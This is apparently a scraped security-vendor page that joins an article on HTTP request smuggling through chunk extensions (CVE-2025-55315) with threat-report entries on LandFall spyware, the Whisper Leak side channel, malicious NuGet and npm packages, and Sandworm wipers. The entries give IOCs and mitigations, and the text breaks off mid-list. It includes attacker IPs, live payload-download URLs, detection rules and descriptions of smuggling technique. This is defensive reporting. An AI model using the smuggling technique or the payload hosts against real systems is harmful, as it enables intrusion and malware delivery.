/o/portal-settings-authentication-opensso-web/com.liferay.portal.settings.web/test_opensso.jsp Victim Industries: Construction & Real Estate, Defense, Financial Services, Government, Hospitality, Information Security, Information Technology, Insurance, Internet & Cloud Services, Life Sciences, Managed Service Providers, Professional Services, Technology Hardware Victim Countries: United Kingdom, United States Mitigation Advice Immediately apply the October Critical Patch Update to all Oracle Identity Manager instances to patch CVE-2025-61757. Add the IP addresses 89.238.132.76, 185.245.82.81, and 138.199.29.153 to your firewall's blocklist. Create a rule in your WAF or IDS/IPS to detect and block any HTTP requests containing the string ';.wadl' in the URL path. Query web server logs and SIEM data for requests containing ';.wadl' in the URL or matching the User-Agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36' to identify potential past or current malicious activity. Compliance Best Practices Establish or enhance a formal vulnerability management program that includes regular scanning, risk assessment, and a defined service-level agreement (SLA) for applying critical security patches. Review and harden Web Application Firewall (WAF) policies to block anomalous URL patterns, such as the use of semicolons for path parameter manipulation, to provide a generic defense against similar authentication bypass techniques. Enhance logging capabilities for critical web applications to capture and retain full HTTP request bodies, especially for POST requests, to improve future incident response and forensic analysis. Implement network segmentation to isolate internet-facing application servers, like Oracle Identity Manager, from internal corporate and database networks to limit the blast radius of a potential compromise.HTTP Request Smuggling Using Chunk Extensions (CVE-2025-55315)
Executive Summary HTTP request smuggling remains one of the nastier protocol-level surprises: it happens when different components in the HTTP chain disagree about where one request ends and the next begins. A recent, high-visibility ASP.NET Core disclosure brought one particular flavor of this problem into the spotlight: attackers abusing chunk extensions in chunked transfer encoding to craft ambiguous request boundaries. The vulnerability was assigned a very high severity (CVSS 9.9) by Microsoft, their highest for ASP.NET Core to date. This article explains what chunk extensions are, why they can be abused for smuggling, how the recent ASP.NET Core issue fits into the bigger picture, and what defenders, implementers, and F5 customers should consider: particularly regarding HTTP normalization, compliance settings, and protection coverage across F5 Advanced WAF, NGINX App Protect, and Distributed Cloud. Background: What Are Chunk Extensions? In HTTP/1.1, chunked transfer encoding (via Transfer-Encoding: chunked) allows the body of a message to be sent in a sequence of chunks, each preceded by its size in hex, terminated by a zero-length chunk. The specification also allows chunk extensions to be appended after the chunk length, e.g.: In theory, chunk extensions were meant for metadata or transfer-layer options: for example, integrity checks or special directives. But in practice, they’re almost never used by legitimate clients or servers: many HTTP libraries ignore or inconsistently handle them, and this inconsistency across intermediaries (proxies and servers) can serve as a source of request smuggling vulnerabilities. But if a lot of servers and proxies ignore it, why would that even be an issue? Let’s see. Root Cause Analysis for CVE-2025-55315 The CVE description reads: “Inconsistent interpretation of HTTP requests (‘HTTP request/response smuggling’) in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.” Examining the GitHub commit reveals a relatively straightforward fix. In essence, the patch adjusts the chunk-extension parser to correctly handle \r\n line endings and to throw an error if either \r or \n appears unpaired. Additionally, a new flag was introduced for backward compatibility. As expected, the vulnerable logic resides in the ParseExtension function. The new InsecureChunkedParsing flag preserves legacy behavior - but it must be explicitly enabled, since that mode reflects the prior (and now considered insecure) implementation. Previously, the parser looked only for the carriage return (\r) character to determine the end of a line. In the updated implementation, it now checks for either a line feed (\n) or a carriage return (\r). Next, we encounter the following condition: The syntax may look a bit dense, but the logic is straightforward. In short, they retained the old insecure behavior when the InsecureChunkedParsing flag is enabled, which is checking the presence of \n only after encountering \r . This is problematic because it allows injecting a single \r or \n inside the chunk extension. In depth, the vulnerable condition, suffixSpan[1] == ByteLF, mirrors the old behavior - it verifies that the second character is \n. We reach this part only if we previously saw \r. The new condition validates that the last two characters of the chunk extension are \r\n. Remember that in the new version, we reach this part when encountering either \r or \n. The fixed condition ensures that if an attacker tries to inject a single \r or \n somewhere within the chunk extension, the check will fail - the condition will evaluate to false. When that happens, and if the backward-compatibility flag is not enabled, the parser throws an exception: Bad chunk extension. And what happened before the patch if the character following \r wasn’t \n? They simply continued parsing, making the following characters part of the chunk extension. That means that a chunk extension could include line terminator characters. The attack affecting unpatched ASP.NET Core applications is HTTP request smuggling via chunk extensions, a technique explained clearly and in depth in this article, which we’ll briefly summarize in this post. Request smuggling using chunk extensions variants Before diving into the different chunk-extension smuggling variants, it’s worth recalling the classic Content-Length / Transfer-Encoding (CL.TE and TE.CL) request smuggling techniques. These rely on discrepancies between how proxies and back-end servers interpret message boundaries: one trusts the Content-Length, the other trusts Transfer-Encoding, allowing attackers to sneak an extra request inside a single HTTP message. If you’re not familiar with CL.TE and TE.CL and other variants, this article gives an excellent overview of how these desync vulnerabilities work in practice. TERM.EXT (terminator - extension mismatch): The proxy treats a line terminator (usually \n) inside a chunk extension as the end of the chunk header, while the backend treats the same bytes as part of the extension. EXT.TERM (extension - terminator mismatch) The proxy treats only \r\n sequence as the end of the chunk header, while the backend treats the line terminator character inside the chunk extension as the end of the chunk header. The ASP.NET Core issue Previously, ASP.NET Core allowed lone \r or \n characters to appear within a chunk extension if the line ended with \r\n, placing it in the EXT category. If a proxy ahead has TERM behavior (treating \n as line end), their parsing mismatch can enable request smuggling. The figure shows an example malicious request that exploits this parsing mismatch. The proxy treats a lone \n as the end of the chunk extension. As a result, the bytes xx become the start of the body and 47 is interpreted as the size of the following chunk. If the proxy forwards the request unchanged (i.e., it does not strip the extension), those next chunks can effectively carry a second, smuggled request destined for an internal endpoint that the proxy would normally block. When Kestrel (the ASP.NET Core backend) receives that same raw stream, it enforces a strict \r\n terminator for extensions. Because the backend searches specifically for the \r\n sequence, it parses the received stream differently - splitting the forwarded data into two requests (the extension content, 2;\nxx is treated as a chunk header + chunk body). The end result: a GET /admin request can reach the backend, even though the proxy would have blocked such a request if it had been observed as a separate, external request. F5 WAF Protections NGINX App Protect and F5 Distributed Cloud NGINX App Protect and F5 Distributed Cloud (XC) normalize incoming HTTP requests and do not support chunk extensions. This means that any request arriving at NAP or XC with chunk extensions will have those extensions removed before being forwarded to the backend server. As a result, both NAP and XC are inherently protected against this class of chunk-extension smuggling attacks by design. To illustrate this, let’s revisit the example from the referenced article. NGINX, which treats a lone \n as a valid line terminator, falls under the TERM category. When this request is sent through NAP, it is parsed and normalized accordingly - effectively split into two separate requests: What does this mean? NAP does not forward the request the same as it arrived. It normalizes the message by stripping out any chunk extensions, replacing the Transfer-Encoding header with a Content-Length, and ensuring the body is parsed deterministically - leaving no room for ambiguity or smuggling. If a proxy precedes NAP and interprets the traffic as a single request, NAP will safely split and sanitize it. F5 Distributed Cloud (XC) doesn’t treat lone \n as line terminators and also discards chunk extensions entirely. Advanced WAF Advanced WAF does not support chunk extensions. Requests containing a chunk header that is too long (more than 10 bytes) are treated as unparsable and trigger an HTTP compliance violation. To improve detection, we’ve released a new attack signature, “ASP.NET Core Request Smuggling - 200020232", which helps identify and block malicious attempts that rely on chunk extensions. Conclusions HTTP request smuggling via chunk extensions remains a very real threat, even in modern stacks. The disclosure of CVE-2025-55315 in the Kestrel web server underlines this: a seemingly small parsing difference (how \r, \n, and \r\n are treated in chunk extensions) can allow an attacker to conceal a second request within a legitimate one, enabling account takeover, code injection, SSRF, and many other severe attacks. This case offers a great reminder: don’t assume that because “nobody uses chunk extensions” they cannot be weaponized. And of course - use HTTP/2. Its binary framing model eliminates chunked encoding altogether, removing the ambiguity that makes these attacks possible in HTTP/1.1.F5 Threat Report - November 12th, 2025
New LandFall Spyware Exploited Samsung Zero-Day via WhatsApp Messages A previously unknown spyware, "LandFall," exploited a critical zero-day vulnerability (CVE-2025-21042) in Samsung's Android image processing library (`libimagecodec.quram.so`) to target select Samsung Galaxy users in the Middle East. Active since at least July 2024, the spyware was delivered via malicious .DNG raw images with appended .ZIP archives sent over WhatsApp, leveraging an out-of-bounds write flaw that allowed remote arbitrary code execution. The LandFall spyware, likely a commercial surveillance framework, targets Galaxy S22, S23, S24 series, Z Fold 4, and Z Flip 4 devices, enabling extensive data exfiltration including microphone and call recordings, location tracking, and access to photos, contacts, SMS, call logs, files, and browsing history. Its components include a loader (`b.so`) and a SELinux policy manipulator (`l.so`) for persistence and privilege escalation, and it can fingerprint devices using hardware and SIM IDs. While C2 infrastructure shows similarities to Stealth Falcon operations and component naming conventions resemble those of NSO Group and other vendors, a definitive attribution remains unconfirmed. Samsung patched the vulnerability in April 2025, and users are advised to apply security updates, disable automatic media downloading in messaging apps, and consider advanced protection features. Severity: Critical Sources https://buaq.net/go-374181.html https://cyberpress.org/landfall-android-malware/ https://meterpreter.org/landfall-spyware-zero-click-image-exploit-spied-on-samsung-phones-for-a-year/ https://www.bleepingcomputer.com/news/security/new-landfall-spyware-exploited-samsung-zero-day-via-whatsapp-messages/ https://www.hendryadrian.com/new-landfall-spyware-exploited-samsung-zero-day-via-whatsapp-messages/ https://www.newsbytesapp.com/news/science/landfall-android-spyware-targeted-samsung-galaxy-phones-for-a-year/story https://www.securityweek.com/landfall-android-spyware-targeted-samsung-phones-via-zero-day/ Threat Details and IOCs Malware: Deadglyph, Landfall, LandFall, LANDFALL CVEs: CVE-2025-21042, CVE-2025-21043, CVE-2025-43300, CVE-2025-55177 Technologies: Apple iOS, Google Android, Samsung Galaxy, Samsung One UI, WhatsApp Threat Actors: Cytrox, FruityArmor, Intellexa, LANDFALL, NSO, NSOGroup, StealthFalcon Attacker Countries: Israel, Spain, United Arab Emirates Attacker IPs: 192.36.57.56, 194.76.224.127, 45.155.250.158, 46.246.28.75, 91.132.92.35, 92.243.65.240 Attacker Domains: brightvideodesigns.com, healthyeatingontherun.com, hotelsitereview.com, projectmanagerskills.com Attacker URLs: https://brightvideodesigns.com/is/, https://healthyeatingontherun.com/is/, https://hotelsitereview.com/is/, https://projectmanagerskills.com/is/ Attacker Hashes: 211311468f3673f005031d5f77d4d716e80cbf3c1f0bb1f148f2200920513261, 2425f15eb542fca82892fd107ac19d63d4d112ddbfe698650f0c25acf6f8d78a, 29882a3c426273a7302e852aa77662e168b6d44dcebfca53757e29a9cdf02483, 384f073d3d51e0f2e1586b6050af62de886ff448735d963dfc026580096d81bd, 69cf56ac6f3888efa7a1306977f431fd1edb369a5fd4591ce37b72b7e01955ee, 9297888746158e38d320b05b27b0032b2cc29231be8990d87bc46f1e06456f93, a62a2400bf93ed84ebadf22b441924f904d3fcda7d1507ba309a4b1801d44495, b06dec10e8ad0005ebb9da24204c96cb2e297bd8d418bc1c8983d066c0997756, b45817ffb0355badcc89f2d7d48eecf00ebdf2b966ac986514f9d971f6c57d18, b975b499baa3119ac5c2b3379306d4e50b9610e9bba3e56de7dfd3927a96032d, c0f30c2a2d6f95b57128e78dc0b7180e69315057e62809de1926b75f86516b2e, d2fafc7100f33a11089e98b660a85bd479eab761b137cca83b1f6d19629dd3b0, ffeeb0356abb56c5084756a5ab0a39002832403bca5290bb6d794d14b642ffe2 Victim Industries: Digital Media, Government, Information Technology, Technology Hardware, Telecommunications Victim Countries: Iran, Iraq, Morocco, Saudi Arabia, South Korea, Turkey, United Arab Emirates Mitigation Advice Update all corporate-managed Samsung Galaxy S22, S23, S24, Z Fold 4, and Z Flip 4 devices to the April 2025 security patch level or a later version to remediate CVE-2025-21042. Issue a directive for all employees to disable automatic media downloading within their WhatsApp application settings on both corporate and personal devices used for work. Instruct users of corporate Android devices to enable the 'Advanced Protection' feature in their device's security settings for enhanced protection against novel spyware. Obtain the indicators of compromise (IOCs) for the six LandFall C2 servers from the Unit 42 report and add them to the network firewall and DNS blocklists. Compliance Best Practices Implement and enforce a Mobile Device Management (MDM) policy to mandate and automate the installation of critical OS security updates on all managed mobile devices within a 72-hour window of their release. Develop and deploy a mandatory, recurring security awareness training program that specifically addresses mobile-based social engineering, the risks of unsolicited attachments from unknown contacts, and safe practices for messaging apps like WhatsApp. Evaluate and deploy a Mobile Threat Defense (MTD) solution on corporate devices to actively monitor for and alert on suspicious activities indicative of spyware, such as permission escalation, use of recording hardware, and anomalous network connections. Establish and enforce a hardened security configuration baseline for all corporate mobile devices that enables high-security features, such as Android's 'Advanced Protection' or iOS's 'Lockdown Mode', by default. Whisper Leak: A Novel Side-Channel Attack on Remote Language Models A novel side-channel attack, termed "Whisper Leak," has been identified, enabling adversaries to infer language model conversation topics from encrypted network traffic by analyzing packet sizes and timings, despite Transport Layer Security (TLS) encryption. This attack exploits the token-by-token, streaming nature of large language model (LLM) responses, allowing network observers (e.g., internet service providers, local network attackers) to compromise user privacy, particularly for sensitive subjects like political dissent. Researchers demonstrated this by training a binary classifier on network traffic patterns for a specific topic ("legality of money laundering"), achieving over 98% accuracy (AUPRC). A simulated real-world scenario involving 10,000 conversations showed the attack could achieve 100% precision in identifying sensitive topics, even with low recall (5-50%), with effectiveness improving as more training data is collected. To mitigate this vulnerability, LLM providers like OpenAI and Azure have implemented "obfuscation" by adding random variable-length text to responses, while Mistral introduced a similar "p" parameter, significantly reducing attack effectiveness. Users can further protect their privacy by avoiding sensitive discussions on untrusted networks, utilizing VPN services, selecting providers with implemented mitigations, and opting for non-streaming models. The source code and a detailed technical report are publicly available. Severity: Critical Sources https://gbhackers.com/whisper-based-attack/ https://securityonline.info/whisper-leak-attack-infers-encrypted-ai-chat-topics-with-98-accuracy/ https://thehackernews.com/2025/11/microsoft-uncovers-whisper-leak-attack.html https://www.microsoft.com/en-us/security/blog/2025/11/07/whisper-leak-a-novel-side-channel-cyberattack-on-remote-language-models/ Threat Details and IOCs Malware: LANDFALL, PrimeCache, PROMPTFLUX, SesameOp, Veaty, Whisper Technologies: Alibaba Cloud Large Language Models, DeepSeek Large Language Model, Google Large Language Models, Meta Large Language Models, Microsoft Azure, Microsoft Azure AI Services, Mistral AI Mistral, OpenAI, xAI, xAI Large Language Models, Zhipu AI Large Language Models Attacker URLs: http://github.com/yo-yo-yo-jbo/whisper_leak Victim Industries: Digital Media, Financial Services, Government, Healthcare, Health Care Technology, Information Technology, Legal Services, Media and Entertainment, Technology Hardware, Telecommunications Victim Countries: China, France, United States Mitigation Advice Require all employees to use the corporate VPN when accessing AI services from untrusted networks, such as public Wi-Fi, to add a layer of traffic encryption and obfuscation. Distribute a security advisory to all staff, prohibiting the use of public or corporate AI chatbots for processing sensitive, confidential, or proprietary business data. Audit all currently used third-party AI services to confirm they have implemented mitigations against traffic analysis attacks. Prioritize and approve the use of services that have deployed such protections. Instruct all teams using LLM APIs to disable 'streaming' mode in their applications and configurations where the feature is not essential for the user experience. Compliance Best Practices Develop and implement a formal Acceptable Use Policy (AUP) for AI tools, defining approved platforms, data sensitivity classifications, and prohibited use cases to govern their safe adoption. Update the third-party risk management program to include specific security requirements for AI vendors, mandating they provide evidence of mitigations against side-channel attacks like traffic analysis. Initiate a research project to evaluate the cost, security benefits, and feasibility of deploying a private LLM for internal use cases involving sensitive company data. Malicious NuGet Packages Plant Time Bomb Malware in Industrial Systems, Siemens S7 PLCs Malicious NuGet packages, published by the user shanhai666 between 2023 and 2024, were discovered by Socket's researchers, containing destructive code designed to activate years in the future. Nine of the twelve packages, downloaded nearly 10,000 times, included payloads that were 99% benign to evade detection and build trust. Several packages targeted major database providers like SQL Server, PostgreSQL, and SQLite, with their malicious logic set to trigger on specific dates in 2027 and 2028. Upon activation, these packages introduce a 20 percent probability of terminating the host application process during database queries. The most critical package, Sharp7Extend, used typosquatting to mimic the legitimate Sharp7 library and targeted Siemens S7 Programmable Logic Controllers (PLCs) widely used in manufacturing. Unlike the database-targeting malware, Sharp7Extend activates immediately upon installation, though its malicious functions cease after June 6, 2028. It employs two mechanisms: a 20 percent chance of terminating the application during Siemens S7 communication operations, and after an initial 30-90 minute grace period, it causes 80 percent of critical commands to fail, potentially leading to safety system failures and data corruption in industrial settings. All identified malicious packages have since been removed from NuGet, and organizations are advised to immediately audit their dependencies for these compromised packages. Severity: Critical Sources https://buaq.net/go-374596.html https://gbhackers.com/nuget-supply-chain/ https://securityonline.info/nuget-sabotage-time-delayed-logic-in-9-packages-risks-total-app-destruction-on-hardcoded-dates/ https://thehackernews.com/2025/11/hidden-logic-bombs-in-malware-laced.html https://www.bleepingcomputer.com/news/security/malicious-nuget-packages-drop-disruptive-time-bombs/ https://www.esecurityplanet.com/threats/malicious-nuget-packages-hide-time-delayed-sabotage-code/ https://www.hendryadrian.com/9-malicious-nuget-packages-deliver-time-delayed-destructive-payloads/ https://www.theregister.com/2025/11/07/cybercriminals_plant_destructive_time_bomb/ Threat Details and IOCs Malware: Sharp7Extend Technologies: Microsoft .NET Framework, Microsoft NuGet, Microsoft SQL Server, NuGet, PostgreSQL, Sharp7, Siemens S7, Siemens SIMATIC S7, SQLite Threat Actors: Shanhai666 Attacker Countries: China Attacker Domains: hendryadrian.com Victim Industries: Automotive, Chemical, Energy, Financial Services, Healthcare, Health Care Technology, Industrial Control Systems, Industrials, Information Technology, Logistics, Manufacturing, Retail Victim Countries: Germany Mitigation Advice Scan all .NET project dependencies to identify if any of the following malicious NuGet packages are present: Sharp7Extend, MyDbRepository, MCDbRepository, SqlDbRepository, SqlRepository, SqlUnicornCoreTest, SqlUnicornCore, SqlUnicorn.Core, or SqlLiteRepository. If any of the malicious NuGet packages are found on a system, immediately isolate that system from the network to begin incident response procedures. Configure your NuGet package manager sources to explicitly block any packages published by the user 'shanhai666'. Immediately investigate any systems using Siemens S7 PLCs for unexplained application crashes or communication failures, as these may be symptoms of the Sharp7Extend malware. Compliance Best Practices Establish a formal policy and process for vetting and approving all third-party software dependencies, including NuGet packages, before they are permitted for use in production code. Implement a private, internal package repository to host only vetted and approved third-party dependencies, and configure developer environments to use this repository as the primary source. Implement tooling and processes to generate and maintain a Software Bill of Materials (SBOM) for all developed and deployed applications to enable rapid dependency auditing. Develop and implement a recurring security training program for all developers focusing on software supply chain risks, including how to identify typosquatting and vet open-source package publishers. Review and enhance network segmentation to ensure that Operational Technology (OT) networks, especially those with PLCs, are isolated from the corporate IT network to prevent cross-domain compromises. MUT-4831 Deploys Vidar Infostealer via 17 Malicious npm Packages Targeting Windows A sophisticated supply chain attack, attributed to the MUT-4831 threat actor cluster, targeted the npm ecosystem with 17 malicious packages across 23 releases, designed to deploy the Vidar v2 infostealer malware on Windows systems. Discovered by Datadog Security Research on October 21, 2025, these packages, masquerading as legitimate SDKs and libraries, remained active for approximately two weeks, accumulating over 2,240 downloads, with `react-icon-pkg` alone accounting for 503. The attack chain involved postinstall scripts downloading an encrypted ZIP archive from `bullethost[.]cloud`, decrypting it, and executing a Windows PE binary named `bridle.exe`. This Go-compiled Vidar variant aggressively harvests sensitive data, including browser credentials, cookies, and cryptocurrency wallets, exfiltrating it after dynamically discovering command-and-control servers via hardcoded Telegram and Steam accounts, then deleting all traces from the compromised system. Severity: Critical Sources https://buaq.net/go-374147.html https://cyberinsider.com/vidar-stealer-2-0-marks-major-evolution-in-infostealer-landscape/ https://cyberpress.org/vidar-malware-analysis/ https://cyberpress.org/weaponized-npm-packages/ https://gbhackers.com/malicious-npm-packages/ https://www.techradar.com/pro/point-of-use-theft-vidars-shift-to-api-level-interception https://www.trendmicro.com/en_us/research/25/j/how-vidar-stealer-2-upgrades-infostealer-capabilities.html Threat Details and IOCs Malware: Arkei, Arkei Stealer, ArkeiStealer, Lumma, LummaC2, Lumma Stealer, Mohazo, Raccoon Stealer, Racealer, RedLine, RedLine Stealer, Spyware.Vidar, StealC, Vidar, Vidar Stealer CVEs: CVE-2023-20118, CVE-2025-34090 Technologies: Amazon Web Services, Apple macOS, Discord, FileZilla, Google Chrome, Microsoft 365, Microsoft Azure, Microsoft Edge, Microsoft Visual Studio, Microsoft Windows, Monero, Mozilla Firefox, Node.js, npm, Opera, Pale Moon, React, Steam, Telegram, Vivaldi, Waterfox, WinSCP Threat Actors: AngryLikho, Bitter, Loadbaks, MUT4831, Storm-2477, WaterKurita Attacker Countries: Azerbaijan, Moldova, Russia Attacker IPs: 65.100.80.190, 65.108.80.90 Attacker Emails: aartrabens@gmail.com, saliii229911@gmail.com Attacker Domains: a.t.rizbegadget.shop, bullethost.cloud, cvt.technicalprorj.xyz, files.catbox.moe, ftp.nadimgadget.shop, gor.technicalprorj.xyz, gra.khabeir.com, gra.nadimgadget.shop, gz.technicalprorj.xyz, iu.server24x.com, mas.to, nv.d.khabeir.com, p.x.rizbegadget.shop, steamcommunity.com, stg.mistonecorp.net, stg.server24.com, stg.server24x.com, telegram.me, t.y.server24x.com, upload.bullethost.cloud Attacker URLs: https://files.catbox.moe/awktpw.zip, https://nv.d.khabeir.com, https://steamcommunity.com/profiles/76561198777118079, https://telegram.me/s/sre22qe, https://upload.bullethost.cloud/download/68f5503834645ddd64ba3e17, https://upload.bullethost.cloud/download/68f55d7834645ddd64ba3e3e, https://upload.bullethost.cloud/download/68f775f734645ddd64ba99f4, https://upload.bullethost.cloud/download/68f77d1134645ddd64ba9a5e, https://upload.bullethost.cloud/download/68f7b14734645ddd64ba9b6e, https://upload.bullethost.cloud/download/68f7c68a34645ddd64ba9b9d, https://upload.bullethost.cloud/download/68f7de3834645ddd64ba9c00, hxxp://mas.to/@oleg98, hxxps://steamcommunity.com/profiles/76561198780411257 Attacker Hashes: 0e90c63363265f75f8637c1a3e9ec277a1ea1a8436dd7561fff59cfb722c6612, 1230f3382910e84d542d64e859fb3064958b47bc50508045cbb5b597b987c65b, 12934992bb65953861b4dfd7a67d3256eae8da19ee86609aa29b68fb77258e98, 1eff512c9b003b08464e071774bd85e43464cce6ad1373463b1f67683d03b956, 288ecc39cdde51783dbb171758ec760652bb929ad17d239a43629449a22429c1, 29b6a1c08e96ce714f9e1f54a4edde3f5e6b41477db5f89f1bd41d931508bdbf, 37d62d7983f7e0012f88e81ba28ad02a839b4d8804851a401b19058ca8cc2cf4, 3dc09740ded920e5899a5386c6731de0c89d6bd182fb89073e910b619980899f, 5f68157e486413ab276fad629d7af21a53b399c5fa8b1a0cfbd37851ceca0381, 8934056f93516a33c4e9eeb2f50aea160860cf229ca6f6ec302bd2c404ebfe59, 95368954efa9618c586bdd8978f41f465450caf268d07ca316cf6975f6e15848, aa49d14ddd6c0c24febab8dce52ce3835eb1c9280738978da70b1eae0d718925, bcf8a6911bf4033cf4d55caf22d7da9d97275bbb3b0f8fefd1129e86bd4b49f8 Victim Industries: Business Services, Cloud Infrastructure, Cryptocurrency, Education, Financial Services, Gaming, Government, Healthcare, Information Technology, Manufacturing, Real Estate, Retail, Social Media, Software, Sports and Entertainment, Technology Hardware, Utilities Mitigation Advice Add the domain `bullethost[.]cloud` to the network firewall and DNS blocklists to prevent connections to the malware distribution server. Use EDR or system scanning tools to search all Windows endpoints and servers for the file `bridle.exe` to identify potential infections. Instruct developers to immediately audit all project `package.json` and lock files for dependencies named `custom-tg-bot-plan`, `react-icon-pkg`, or any packages published by npm users `aartje` and `saliii229911`. Review network logs for unusual outbound connections from developer workstations or build servers to Telegram or Steam APIs, as this is a C2 channel used by this Vidar variant. Compliance Best Practices Establish a new security policy to disable automatic execution of npm `postinstall` scripts by default using the `--ignore-scripts` flag, and create a process to vet and explicitly allow scripts only for trusted packages. Deploy a private npm registry or a caching proxy, such as Sonatype Nexus or JFrog Artifactory, to host only vetted and approved third-party packages for internal developer use. Integrate a Software Composition Analysis (SCA) tool into the CI/CD pipeline to automatically scan npm packages for known vulnerabilities and malicious code signatures on every build. Enforce a policy requiring all projects to use lockfiles (e.g., `package-lock.json`) and mandate the use of `npm ci` instead of `npm install` in all automated build environments to ensure reproducible and vetted dependency installation. On all Windows developer workstations and build servers, enable PowerShell Script Block Logging and Module Logging and forward logs to your SIEM for analysis. Configure the PowerShell execution policy on all Windows developer workstations and build servers to `RemoteSigned` or stricter via Group Policy to prevent the execution of unsigned, untrusted scripts. Sandworm (GRU) Wiper Attacks Target Ukraine's Critical Infrastructure Russian state-controlled Sandworm, identified as part of the GRU, has consistently deployed destructive wiper malware against Ukraine, with recent attacks reported in April, June, and September. These attacks targeted a Ukrainian university with Sting and Zerlot wipers, and later expanded to critical infrastructure, including government, energy, logistics, and notably, the grain industry, aiming to weaken the country's war economy. This continues a pattern of Russian cyber warfare, which previously included the NotPetya worm in 2012, attacks on Ukraine's electricity grid in 2016-2017, and 2022 incidents affecting satellite modems and a Kyiv TV station, alongside other wipers like WhisperGate. Other Russian-aligned groups like RomCom, which exploited a WinRar zero-day, and Gamaredon have also conducted wiper attacks, with UAC-0099 sometimes providing initial access through spear phishing, underscoring wipers' enduring role as a preferred tool for Russian threat actors. Severity: Critical Sources https://arstechnica.com/security/2025/11/wipers-from-russias-most-cut-throat-hackers-rain-destruction-on-ukraine/ https://buaq.net/go-372169.html https://buaq.net/go-372777.html https://buaq.net/go-373967.html https://cyberpress.org/russian-hackers-2/ https://cyberpress.org/weaponized-zip-documents/ https://gbhackers.com/living-off-the-land-tactics/ https://gbhackers.com/ssh-tor-backdoor/ https://industrialcyber.co/ransomware/sandworm-linked-webshell-and-lotl-tactics-found-in-russian-cyberattacks-targeting-ukrainian-networks/ https://securityonline.info/russian-apts-exploit-lotl-techniques-in-ukraine-cyber-attacks-deploying-sandworm-linked-webshell-and-credential-dumping/ https://securityonline.info/sandworm-apt-attacks-belarus-military-with-lnk-exploit-and-openssh-over-tor-obfs4-backdoor/ https://socprime.com/blog/russian-hackers-target-ukrainian-organizations/ https://thehackernews.com/2025/10/russian-hackers-target-ukrainian.html https://thehackernews.com/2025/11/trojanized-eset-installers-drop.html https://www.bleepingcomputer.com/news/security/sandworm-hackers-use-data-wipers-to-disrupt-ukraines-grain-sector/ https://www.esecurityplanet.com/threats/russian-linked-cyberattacks-continue-to-target-ukrainian-organizations/ https://www.helpnetsecurity.com/2025/11/03/russian-belarusian-military-spear-phishing/ https://www.hendryadrian.com/living-off-the-land-allowed-russia-linked-group-to-breach-ukrainian-entities-this-summer/ https://www.hendryadrian.com/ukrainian-organizations-still-heavily-targeted-by-russian-attacks/ https://www.metacurity.com/cisa-plans-to-fire-54-employees-despite-court-injunction/ https://www.securityweek.com/destructive-russian-cyberattacks-on-ukraine-expand-to-grain-sector/ Threat Details and IOCs Malware: Acid Pour, AcidPour, AcidRain, BACKORDER, BE2, BE3, Black Energy, BlackEnergy, Blakken, BPFDoor, CaddyWiper, Chisel, CRASHOVERRIDE, Diskcoder.C, EternalPetya, ExPetr, FoxBlade, FruitShell, GoldenEye, GootKit Loader, GootLoader, HermeticWiper, Industroyer, IsaacWiper, Kalambur, KillDisk, LAMEHUG, Localolive, LocalOlive, NEARMISS, NotPetya, Nyetna, Nyetya, NyetYa, PathWiper, PEAPOD, Petna, Petya 2.0, Petya.A, Pnyetya, PromptSteal, Pterodo, PteroPSDoor, PteroVDoor, QuietVault, RomCom, RomCom RAT, RomCom RAT 5.0, RustyClaw, SingleCamper, SnipBot, Sting, SUMBUR, VPNFilter, WhisperGate, Zerlot, Zerolot, ZeroLot, ZEROLOT CVEs: CVE-2013-3906, CVE-2014-4114, CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148, CVE-2017-0199, CVE-2019-10149, CVE-2021-32648, CVE-2021-34473, CVE-2022-41352, CVE-2023-23397, CVE-2023-32315, CVE-2023-32784, CVE-2023-42793, CVE-2023-48788, CVE-2024-1709, CVE-2025-53770, CVE-2025-8088 Technologies: ESET Endpoint Security, KeePass, Linux, Microsoft Active Directory, Microsoft Internet Information Services, Microsoft Windows, MikroTik RouterOS, MikroTik WinBox, OpenSSH, Python, RARLAB WinRAR, SonicWall Secure Mobile Access, Tor Threat Actors: Actinium, AngryLikho, APT28, APT44, AquaBlizzard, Armageddon, AwakenLikho, BlackEnergy, CoreWerewolf, DEV-0861, EarthBluecrow, ELECTRUM, FROZENBARENTS, Gamaredon, InedibleOchotense, IRIDIUM, IronTilden, IRONVIKING, MuddyWater, PrimitiveBear, Quedagh, RedMenshen, RomCom, Sandworm, SeashellBlizzard, Shuckworm, StickyWerewolf, Storm-0978, Storm0978, TA450, TA453, TA455, Telebots, TridentUrsa, TropicalScorpius, Turla, UAC0002, UAC-0010, UAC0010, UAC-0082, UAC0082, UAC-0099, UAC0113, UAC-0125, UAC0125, Uac0145, UNC2565, UNC2596, UNC530, Unit74455, UNKSmudgedSerpent, VoidRabisu, VoodooBear, Winterflounder Attacker Countries: China, Iran, Myanmar, North Korea, Russia Attacker IPs: 156.67.24.239, 185.145.245.209, 77.20.116.133 Attacker Domains: ciscoheartbeat.com, eliteheirs.org, esetremover.com, esetscanner.com, esetsmart.com, melamorri.com, taibdsgqlwvnizgipp4sn7xee72qys3pufih3rjzhx3e5b5t245kafid.onion, yuknkap4im65njr3tlprnpqwj4h7aal4hrn2tdieg75rpp6fx25hqbyd.onion Attacker URLs: 185.145.245.209:22065/service.aspx Attacker Hashes: 08db5bb9812f49f9394fd724b9196c7dc2f61b5ba1644da65db95ab6e430c92b, 30a5df544f4a838f9c7ce34377ed2668e0ba22cc39d1e26b303781153808a2c4, 44b1f3f06607cd3ee16517d31b30208910ce678cb69ba7a0514546dff183dfce, 5d3a6340691840d1a87bfab543faec77b4a9d457991dd938834de820a99685f7, 636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb, 70a5492db39585ec18de512058a5389c9a4043fba13ca8ad7d057ead66298626, 710e8c96875d6a3c1b4f08f4b2094c800658551065b20ef3fd450b210dcc7b9a, 7269b4bc6b3036e5a2f8c2a7908a439202cee9c8b9e50b67c786c39f2500df8f, 7946a2275c1c232eebed6ead95ea4723285950175586db1f95354b910b0a3cce, 821362a484908e93f8ba748b600665ae6444303d, 8c07c37ac84d4c6fd76de3d966e26b65e401bc641a845baf6f73ad0d6a10fc6b, 99ec6437f74eec19e33c1a0b4ac8826bcc44848f87cd1a1c2b379fae9df62de9, 9f3d8252e8f3169751a705151bdf675ac194bfd8457cbe08e1f3c17d7e9e9be2, 